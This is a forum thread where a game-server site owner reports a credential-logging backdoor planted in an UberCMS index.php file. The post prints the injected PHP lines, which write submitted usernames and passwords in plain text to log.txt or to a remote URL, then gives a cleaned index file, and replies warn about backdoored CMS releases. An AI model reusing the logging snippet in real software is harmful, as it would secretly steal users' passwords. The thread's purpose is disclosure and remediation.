UberCMS Index Exploit - Log.TXT

Status
Not open for further replies.
Joined
Nov 29, 2008
Messages
526
Reaction score
95
Hey guys,

Recently I had an issue with someone gaining access to admins accounts on the hotel and attempting to 'screw **** up' but it didn't work as well as they wished...

Anyway, I couldn't get my head around exactly what was occuring... Until, I stumbled across a file called 'log.txt' and after doing some digging, I found that every time someone logged into the CMS, their user and password were logged in this file.

Example: jay pass user pass user2 pass user3 pass etc.

I couldn't work out how this was happening, then after check index.php I found a suspicious line of code.

PHP:
a = $_POST['credentials_username'];$b = $_POST['credentials_password'];$myFile = "log.txt";$fh = fopen($myFile, 'a') or die("can't open file");$stringData = $a . " " . $b . "\n";fwrite($fh, $stringData);fclose($fh);

 $a = $_POST['credentials_username'];$b = $_POST['credentials_password'];$myFile = "http://forum.ragezone.com/images/hackers.jpg";$fh = fopen($myFile, 'a') or die("can't open file");$stringData = $a . " " . $b . "\n";fwrite($fh, $stringData);fclose($fh);

As you can see, this is obviously what was causing all our users / passwords to be logged, and I'm glad I finally found it... So I don't want you all going through the same **** that I had to...

Anyway, Check your index.PHP to make sure you don't have anything like this there, and if you ever stumble accross this exploit, now you know... I have no f'ing idea how they gained access to my index.PHP/htdocs though...

Please thank me If this helped you

Regards,

Jay

P.S - Fixed index:
PHP:
<?php
/*=======================================================================
| UberCMS - Advanced Website and Content Management System for uberEmu
| #######################################################################
| Copyright (c) 2010, Roy 'Meth0d' and updates by Matthew 'MDK'
| http://www.meth0d.org & http://www.sulake.biz
| #######################################################################
| This program is free software: you can redistribute it and/or modify
| it under the terms of the GNU General Public License as published by
| the Free Software Foundation, either version 3 of the License, or
| (at your option) any later version.
| #######################################################################
| This program is distributed in the hope that it will be useful,
| but WITHOUT ANY WARRANTY; without even the implied warranty of
| MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
| GNU General Public License for more details.
\======================================================================*/

require_once "global.php";	
	
if (LOGGED_IN)
{
	header("Location: " . WWW . "/me");
	exit;
}

$tpl->Init();

$tpl->SetParam('page_title', 'Create your avatar, decorate your room, chat and make new friends.');
$tpl->SetParam('credentials_username', '');

$tpl->AddGeneric('head-init');
$tpl->AddIncludeSet('frontpage');
$tpl->WriteIncludeFiles();
$tpl->AddGeneric('head-overrides-fp');
$tpl->AddGeneric('head-bottom');

$frontpage = new Template('page-fp');
$frontpage->SetParam('login_result', '');

if (isset($_POST['credentials_username']) && isset($_POST['credentials_password']))
{
	$frontpage->SetParam('credentials_username', $_POST['credentials_username']);

	$credUser = filter($_POST['credentials_username']);
	$credPass = $core->UberHash($_POST['credentials_password']);
	
	$errors = array();
	
	if (strlen($_POST['credentials_username']) < 1)
	{
		$errors[] = "Please enter your username";
	}
	
	if (strlen($_POST['credentials_password']) < 1)
	{
		$errors[] = "Please enter your password";
	}
	
	if (count($errors) == 0)
	{
		if ($users->ValidateUser($credUser, $credPass))
		{
			if (isset($_POST['page']))
			{
				$reqPage = filter($_POST['page']);
				$pos = strrpos($reqPage, WWW);
			
				if ($pos === false || $pos != 0)
				{
					die("<b>Security warning!</b> A malicious request was detected that tried redirecting you to an external site. Please proceed with caution, this may have been an attempt to steal your login details. <a href='" . WWW . "'>Return to site</a>");
				}
				else
				{
					$_SESSION['page-redirect'] = $reqPage;
				}
			}		
					
			$_SESSION['UBER_USER_N'] = $users->GetUserVar($users->Name2id($credUser), 'username');
			$_SESSION['UBER_USER_H'] = $credPass;
			
			if (isset($_POST['_login_remember_me']))
			{
				$_SESSION['set_cookies'] = true;
			}
			
			header("Location: " . WWW . "/security_check");
			exit;
		}
		else
		{
			$errors[] = "Incorrect password";
		}
	}

	if (count($errors) > 0)
	{
		$loginResult = '<div class="action-error flash-message"><div class="rounded"><ul>';

		foreach ($errors as $err)
		{
			$loginResult .= '<li>' . $err . '</li>';
		}
		
		$loginResult .= '</ul></div></div>';
		
		$frontpage->SetParam('login_result', $loginResult);
	}
}

$tpl->AddTemplate($frontpage);
$tpl->AddGeneric('footer');

$tpl->Output();

?>

Also: F**k you academ1c from "Yoko hotel", I know you were the one that peformed the exploit, but nice fail... I'm sorry that you have to try and rip other hotels users because you don't have any and can't get any yourself :thumbdown:

EDIT: Seems as If I'm not the first one to have this - (IP's logged only on there though)... Why would someone wish to log IP's​
 
Last edited:
And eh MDK added this to ubercms, im pretty sure :P

I don't think so, as I have his original download and it's not in the original index... (As this is where I got the index fix from) :P

Although, MDK did post a backdoor exploit in the housekeeping somewhere, which was diminished of.
 
I believe you downloaded the exploitable version iJay because the one I have doesn't have this. Maybe this is a good lesson to retro owners.. never trust a CMS release unless it's released by a trusted and respected member of the community oh and also you should scan through the files. Alot of people release CMS' with shells binded into normal looking file names.

But kudos for releasing a fixed version. You'll save the 12 year old's from panic attacks.
 
you've been phished dumb***.. meaning someone has a shell or something on your box. likely a shell because you probably use xampp..

explanation: the username and password in the post variable are written to a file (log.txt) without being hashed since they are done from the file itself so they are plain text and not the database, which someone added in the index through a shell or some other sort of access..
 
Last edited:
I believe you downloaded the exploitable version iJay because the one I have doesn't have this. Maybe this is a good lesson to retro owners.. never trust a CMS release unless it's released by a trusted and respected member of the community oh and also you should scan through the files. Alot of people release CMS' with shells binded into normal looking file names.

But kudos for releasing a fixed version. You'll save the 12 year old's from panic attacks.

I don't get it! Why do people pick on 12 year old kids and younger? Everybody was 12 and younger. Grow up and be mature and respect everyone! EVEN if there an ass to you.

---------- Post added at 05:22 PM ---------- Previous post was at 05:21 PM ----------

But kudos for releasing a fixed version. You'll save the 12 year old's from panic attacks.

I don't get it! Why do people pick on 12 year old kids and younger? Everybody was 12 and younger. Grow up and be mature and respect everyone! EVEN if there an ass to you.
 
I don't get it! Why do people pick on 12 year old kids and younger? Everybody was 12 and younger. Grow up and be mature and respect everyone! EVEN if there an ass to you.

---------- Post added at 05:22 PM ---------- Previous post was at 05:21 PM ----------

But kudos for releasing a fixed version. You'll save the 12 year old's from panic attacks.

I don't get it! Why do people pick on 12 year old kids and younger? Everybody was 12 and younger. Grow up and be mature and respect everyone! EVEN if there an ass to you.

It's just a saying because the younger kids and the "12 year olds" tend to be the ones more "nooby" or "less-experienced" so we just say it as that's how we classify them.

Besides that,

1. Off-topic
2. Stop getting all worked up about some tiny little saying
3. Don't double post
 
Status
Not open for further replies.
Back